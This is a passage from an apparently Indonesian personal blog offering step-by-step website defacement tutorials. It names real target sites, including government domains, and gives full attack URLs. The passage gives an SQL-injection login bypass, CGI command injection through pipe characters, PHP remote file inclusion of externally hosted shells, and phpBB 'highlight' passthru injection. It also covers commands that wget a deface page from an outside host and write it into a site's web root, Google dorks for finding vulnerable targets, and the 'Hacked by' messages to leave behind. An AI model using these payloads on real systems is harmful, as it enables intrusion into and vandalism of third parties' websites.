ntar dimarah mama). Trus klik tombol “submit” atau tombol apa
namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus
ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing
lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.
Berarti guestbook tsb bisa dideface.

Catatan :
Kalo nggak ada gambarnya, yg ada hanya tulisan

berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !
cari target yg lain.

III. Kalo udah muncul gambar yg kita masukkan tadi,
buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.

contoh :

Nama : deface
Email : deface_2005@yahoo.com
Website : www.deface.com
Asal : dunia maya
komentar :

Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.

Catatan :
Sebelum lu memasukkan script diatas tadi, lu edit dulu kata2 nya sesuai
keinginan lu.

IV. Klik tombol “submit” atau tombol apa namanya yg ada di guestbook tsb.
Selanjutnya buka url/browsing baru trus ketik target tadi www.namatarget.my/guestbook.php
Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing lu.
Nah…muncul deh hasil deface kita di guestbook tsb.

======================================

deface asp dgn sql injection

1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target www.namatarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru trus ketikkan target tadi misal nya www.namatarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url lu

======================================

deface cgi

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<< file aslinya
tambahin |pwd| diujungnya
|pwd| <<< perintah/bug utk linux/unix

https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|pwd|

yg keluar di web target adalah /home/sites/site52/users/wolfsecu/web/coartcds/Web_store
ok......lanjut
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html|wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /home/sites/site52/users/wolfsecu/web/jh.htm|
kasih jarak 1 spasi wget dgn situs lu
-O << ini huruf -O besar, bukan angka nol
cara liat nya => https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< perhatikan baik2
.../home/sites/site52/users/wolfsecu/web/jh.htm <<< perhatikan baik2
.../coartcds/Web_store <<< musti dibuang
cara cari target => allinurl:*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl:*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target nya musti file html diujung nya kalo mau tambahin |pwd|

=======================================

deface cgi II

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|id|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd|

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net – surabayahack” > /usr/home/web/users/a0004481/html/adspro/jh.html|

http://www.sports-media.org/adspro/jh.html

http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm << file asli
|id| <<<<<<<<<<<<<<< utk meliat user yg ada diserver tsb
|pwd| <<<<<<<<<<<<< utk meliat file yg ada diserver tsb
http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|pwd| >>>>>>> usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro
usr/home/web/users/a0004481/html/adspro/cgi-bin/adspro <<<<<<<< perhatikan baik2
usr/home/web/users/a0004481/html/adspro/jh.html <<<<<<<< perhatikan baik2
cgi-bin/adspro <<<<<<< dibuang
liat file index.html => http://www.sports-media.org/adspro/cgi-bin/adspro/dhtml.pl?page=top.htm|whereis%20index.html|
http://www.enveracruz.com.mx/mercadito.cgi?page=../ventas.html|echo “Hacked by psychophysiological. Hey admin…do you a need help ? Matrix.Dal.Net – surabayahack”>decae.html|&cart_id=9721374.5730

http://samedesign.us/cgi-bin/web_store.cgi?page=about.html|echo%20

======================================

deface php dgn injection

http://dillon2.edumail.us/index.php?name=PNphpBB2&file=index&c=4
itu file aslinya
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
itu bug nya

http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?

jadi index.php?name=PNphpBB2&file=index&c=4 dibuang
cara inject nya http://dillon2.edumail.us/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak command unix masukin
wget http://geocities.com/nusantarajaya_2004/arai.html
cara liat nya http://dillon2.edumail.us/modules/PNphpBB2/includes/arai.html

http://www.narnia-chroniken.de <<< halaman depan di deface

http://www.narnia-chroniken.de/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/sandal_karet/script/arai2.jpg?

ketik : pwd
cd /homepages/7/d117874362/htdocs;wget file deface

========================================

deface php dgn injection II

http://www.giphted.com/index.php?siteName=pics%2Fom%2Findex.php
itu file aslinya

http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?

dikotak masukin: pwd
jadi pics%2Fom%2Findex.php dibuang
cara inject nya http://www.giphted.com/index.php?siteName=http://www.geocities.com/sandal_karet/script/arai2.jpg?
dikotak masukin: wget http://www.geocities.com/nusantarajaya_2004/arai.html -O /export/home/beangyy/www/arai.html
cara liat nya http://www.giphted.com/arai.html

=========================================

deface phpbb/forum

http://www.bpmpt.go.id/forum/index.php
itu file aslinya
includes/db.php?phpbb_root_path=
itu bug nya
jadi index.php dibuang

http://www.bpmpt.go.id/forum/includes/db.php?phpbb_root_path=http://www.geocities.com/sandal_karet/script/ara2.jpg?

dikotak masukin: pwd
Kalo keluar “Hacking attempt” artinya dipath
Tapi kalo berhasil, terserah lu mau di apain……

==========================================

deface phpbb/forum II

http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12
itu file aslinya
&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd
itu bug nya

cara inject nya http://www.aventyrliga.se/phpBB2/viewtopic.php?t=12&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

cara wget nya ada 3 cara :
1.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html;ls
2.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=wget%20http://geocities.com/nusantarajaya_2004/arai.html -O /var/www/singapore/jh2.htm
3.http://singapore.bluejackings.net/viewtopic.php?t=51&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=lwp-download%20http://geocities.com/nusantarajaya_2004/arai.html;ls
biasa nya cara ke 3 yg berhasil.

cara liat nya http://singapore.bluejackings.net/arai.html

=========================================

cara liat fs tanpa login

http://www.friendster.com/useropen.php?uid=
<<<<<< masukin nomor id nya

===========================================

deface php dgn injection III

langsung di tembak aja bos biar ga lama2
www.target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?
kolo berhasil seperti biasa
cmd sql php injection
buat nyari akses ke foldernya
cmd => find / -perm 777 -type d
klo foldernya permision denied berarti kita ga bisa apa2 di folder itu
cari folder yg ga ada tulisan perm
ambil contoh ini

http://www.haddenhamonline.co.uk/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/ank_newz/sql.htm?

cari akses foldernya [commndnya diatas]
cmd => find / -perm 777 -type d
bakal makan B/w
jd sabar aja
=== contoh -perm denied ==
find: /mnt/drive2/lost+found: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
itu artinya no akses
kita cari yg lain
tp usahakan foldernya yg /var/www/
klo ga ada juga gpp
ada yg lain
/home/httpd/vhosts/hdca.org/httpdocs/downloads => contoh folder yg bisa
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;[command dasar OSnya]
[command dasar OSnya] => wget, dir, cat, rm, rv -rf dll
skarang kita wget
cd /home/httpd/vhosts/hdca.org/httpdocs/downloads;wget http://www.geocities.com/nusantarajaya_2004/arai.html
coba lo masukin
ke cmdnya
———————————————————
–10:35:01– http://www.geocities.com/nusantarajaya_2004/arai.html
=> `arai.html’
Resolving www.geocities.com… 66.218.77.68
Connecting to www.geocities.com[66.218.77.68]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6,021 [text/html]
0K ….. 100% 98.21 KB/s
10:35:02 (98.21 KB/s) – `arai.html’ saved [6,021/6,021]
———————————————————
itu artinya sukses ke save
karena httpdocs
gampang cara liatnya
/home/httpd/vhosts/hdca.org/httpdocs/downloads => www.hdca.org/downloads/[file deface lo]
contoh www.hdca.org/downloads/arai.html
selsai deh
gampang kan

http://www.zone-h.org/defaced/2005/08/06/www.estudioadobbato.com.ar/

http://www.blogbugs.com/index.php?mod=articledetail&&aid=Nzk=

http://www.tyg2004.de/index.php?page=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=id;pwd

http://img143.imageshack.us/img143/6782/hacked8lc.jpg

http://www.sobatpadi.net/download/

http://www.sinjai.go.id/profil.php?kat=kelautan_perikanan&dir=http://www.geocities.com/dian_maulani2005/inject.htm?&cmd=id;pwd;ks%20-la
http://www.infokomputer.com/aktual/aktual.php?id=Dian+Maulani

Aya 20 Bloger nu komen | Permalink

Vulnerabilities pesan.php

Ditulis 21 September 2005 di Hacking Tabuh 16:29 → ngan 1 bloger komentar

Buka www.google.co.id trus ketik allinurl:.org/pesan.php
Kalo udah dapat target nya misal nya : http://policewives.org/pesan.php
trus liat Clik here to sign in message. Linknya http://policewives.org/pesan.php?op=add
Di kolom pesan inject dgn script :
Kalo ada gambar nya berarti bisa dideface.
Kalo nggak ada gambarnya, yg ada hanya tulisan berarti nggak bisa dideface.
Jgn kecewa ! cari target yg lain.
Kalo ada gambar nya Selanjut nya kita inject lagi dgn script deface guestbook (Lihat tutorial deface guestbook).
SELESAI !!!

ngan 1 bloger komentar | Permalink

Halaman 55 dari 56« Awal «552 53 545556

- aRai -

"Sebuah cerita dapat mengejutkan kita hingga kita mengenali kebenaran yang baru, menawarkan sudut pandang yang baru, suatu cara baru untuk memandang jagat raya ini"

aRai on Ping.sg

Kategori

Categories
- Coretan (110)
- Curhatan (53)
- Film (3)
- Gak Penting (29)
- Hacking (15)
- Ketawa Dunk (4)
- Links (36)

Blogline | Newsgator | Yahoo

Kafe Blogger Indonesia